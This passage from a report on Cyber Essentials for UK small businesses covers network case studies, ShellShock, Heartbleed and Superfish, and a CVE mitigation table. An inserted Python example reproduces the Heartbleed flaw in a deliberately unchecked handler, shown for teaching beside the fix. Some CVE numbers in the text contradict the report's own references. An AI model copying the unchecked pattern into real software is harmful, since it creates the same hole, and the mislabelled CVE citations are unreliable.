User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so these will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12 SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain Servers are the most common local service providers, all present in more than 1/3 of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these, it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from Survey Respondents' data considers the overall response, in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13 Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.

"Heartbleed"

Appearing in April 2014, the CVE-2014-6271 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-6271 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
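The buffer over-read the CVE text describes comes down to one missing length check in the Heartbeat Extension handler. The following added example (not OpenSSL's code, and not from the report) models the RFC 6520 heartbeat message in Python with an unchecked handler beside the bounds-checked one; the "process memory" buffer and the placeholder secret stored after the record are constructed for the demonstration.

```python
"""Added example: a model of Heartbeat Extension (RFC 6520) handling, showing
the missing bounds check behind Heartbleed and the check that closes it.
Not OpenSSL's code; the memory buffer and its contents are constructed."""
import struct
from typing import Optional, Tuple

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """HeartbeatMessage: type (1 byte) | payload_length (2 bytes) | payload | padding.
    claimed_length lets the demonstration build a message whose length field
    does not match the payload actually carried."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def respond_unchecked(memory: bytearray, record_offset: int, record_length: int) -> bytes:
    """Pre-1.0.1g behaviour: the payload length is trusted as received and that
    many bytes are copied from the record's position in memory, so a length
    larger than the record reads past it into whatever the process holds next."""
    _msg_type, length = struct.unpack_from("!BH", memory, record_offset)
    payload_start = record_offset + 3
    payload = bytes(memory[payload_start:payload_start + length])  # over-read happens here
    return struct.pack("!BH", HEARTBEAT_RESPONSE, length) + payload


def respond_checked(memory: bytearray, record_offset: int,
                    record_length: int) -> Optional[bytes]:
    """Fixed behaviour: a message whose declared payload (with the type, length
    and minimum padding fields) does not fit inside the received record is
    silently discarded, so nothing beyond the record can be echoed back."""
    if record_length < 1 + 2 + MIN_PADDING:
        return None
    _msg_type, length = struct.unpack_from("!BH", memory, record_offset)
    if 1 + 2 + length + MIN_PADDING > record_length:
        return None
    payload_start = record_offset + 3
    payload = bytes(memory[payload_start:payload_start + length])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, length) + payload


# Constructed process memory: the received record sits directly in front of
# other data the server holds (standing in for the keys the CVE text mentions).
SECRET = b"-----BEGIN PRIVATE KEY----- (constructed placeholder)"


def simulate(message: bytes) -> Tuple[bytes, Optional[bytes]]:
    """Run both handlers over the same constructed memory layout."""
    memory = bytearray(message + SECRET)
    return (respond_unchecked(memory, 0, len(message)),
            respond_checked(memory, 0, len(message)))


def leaks_secret(response: Optional[bytes]) -> bool:
    """True if any part of the data beyond the record came back in the reply."""
    return response is not None and SECRET[:10] in response


if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    oversized = build_heartbeat(b"ping", claimed_length=64)  # claims 64 bytes, carries 4
    for name, msg in (("honest", honest), ("oversized length field", oversized)):
        unchecked, checked = simulate(msg)
        print(f"{name}: unchecked leaks={leaks_secret(unchecked)}, "
              f"checked leaks={leaks_secret(checked)}")
```

The honest message is answered identically by both handlers; the message with the oversized length field is answered by the unchecked handler with the padding and the start of the adjacent data, and is dropped by the checked one.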

"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2014-6271 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software, which essentially breaks the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they then have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts, but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations, additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice, and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls most widely in use could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls, whereas patch management is not necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network, hardware and software, as well as any items downloaded from the internet or received as email attachments. It serves as a last line of defence and as such is vital to an organisation's cyber-safety.

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 12 of 28

References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Cyber Controls Applicability
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
